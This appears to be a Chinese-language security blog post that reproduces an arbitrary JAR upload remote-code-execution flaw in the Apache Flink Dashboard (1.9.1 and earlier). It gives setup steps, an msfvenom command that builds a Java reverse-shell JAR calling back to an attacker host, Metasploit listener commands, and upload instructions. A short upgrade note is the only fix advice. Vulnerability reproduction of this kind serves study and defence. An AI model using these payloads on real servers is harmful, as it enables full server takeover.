Apache Flink 任意 Jar 包上传导致 RCE 漏洞


Apache Flink 任意 Jar 包上传导致 RCE 漏洞

Apache Flink 是一个分布式大数据处理引擎,可对有限数据流和无限数据流进行有状态计算。可部署在各种集群环境,对各种大小的数据规模进行快速计算。

ApacheFlink 是由 Apache 软件基金会开发的开源流处理框架,其核心是用 Java 和 Scala 编写的分布式流数据流引擎。Flink 以数据并行和流水线方式执行任意流数据程序,Flink 的流水线运行时系统可以执行批处理和流处理程序。此外,Flink 的运行时本身也支持迭代算法的执行。

攻击者可利用该漏洞在 Apache Flink Dashboard 页面中上传任意 Jar 包,利用 Metasploit 在Apache Flink 服务器中执行任意代码,获取服务器最高权限,所以危害性较大。

影响范围

  • Apache Flink <= 1.9.1

环境搭建

  1. 下载 Apache Flink 1.9.1 包:
wget http://mirrors.tuna.tsinghua.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
  1. 解压安装包:
tar –zxvf flink-1.9.1-bin-scala_2.11.tgz
  1. 进入到 bin 目录下面启动 Flink:
./start-cluster.sh

运行截图

浏览器访问:http://IP:8081

漏洞复现

  1. msf 生成 reverse shell 的马
msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f jar > shell.jar
  1. msf 设置监听
use exploit/multi/handler
set payload java/shell/reverse_tcp
expolit

  1. 上传 shell.jar 并提交

  1. 反弹回的 shell

修复建议

  • 将 Apache Flink 升级最新版本

文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
Apache Solr CVE-2019-12409 RCE 漏洞复现 Apache Solr CVE-2019-12409 RCE 漏洞复现
Apache Solr CVE-2019-12409 RCE 漏洞复现该漏洞源于默认配置文件 solr.in.sh 中的 ENABLE_REMOTE_JMX_OPTS 配置选项存在安全风险。 如果使用受影响版本中的默认 solr.in.sh
2019-11-20
下一篇 
Apache Shiro padding oracle attack漏洞复现 Apache Shiro padding oracle attack漏洞复现
Apache Shiro padding oracle attack漏洞复现Shiro 使用了 AES-128-CBC 模式对 cookie 进行加密,导致恶意用户可以通过 padding oracle 攻击方式构造序列化数据进行反序列化攻
2019-11-18
  目录